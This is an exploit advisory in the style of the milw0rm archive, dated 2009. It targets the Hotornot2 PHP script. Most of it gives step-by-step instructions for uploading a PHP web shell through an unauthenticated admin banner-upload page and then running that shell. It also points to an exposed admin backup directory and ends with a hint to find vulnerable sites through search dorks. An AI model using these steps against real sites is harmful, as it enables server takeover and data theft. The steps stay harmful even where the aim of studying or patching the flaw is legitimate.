44 lines
No EOL
1.5 KiB
Text
44 lines
No EOL
1.5 KiB
Text
[+]
|
|
Hotornot2 Script (Remote apload) Admin Bypass Vulnerability
|
|
|
|
===== ++ by sniper code++============================================
|
|
|
|
Author : sniper code ( S.C.T-443 )
|
|
website : www.sec-code.com
|
|
===================================================================================================================
|
|
[+]
|
|
ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
|
|
====================================================================================================================
|
|
[+]
|
|
Exploit:
|
|
|
|
GO to :
|
|
http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to registeration)
|
|
|
|
you will see (Upload banners)
|
|
|
|
( browse and select file like example : Shell.php) and press upload )
|
|
you can press View banners button to see and ensoure your file uploaded ...
|
|
|
|
then Go to :
|
|
http://localhost/[path]/banners/Shell.php ( will view the shell )
|
|
|
|
[+]
|
|
for bypassing admin backup :
|
|
Go to :
|
|
http://localhost/[path]/admin/backup
|
|
|
|
dork : use ur mind ^_^
|
|
|
|
Thats it . . .
|
|
|
|
===================================================================================================================
|
|
[+] Greetz to :
|
|
|
|
[»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh
|
|
[»] JiKo, Crackerz child...
|
|
[=]all members of tryag.cc + sec-code.com
|
|
|
|
===================================================================================================================
|
|
|
|
# milw0rm.com [2009-05-26] |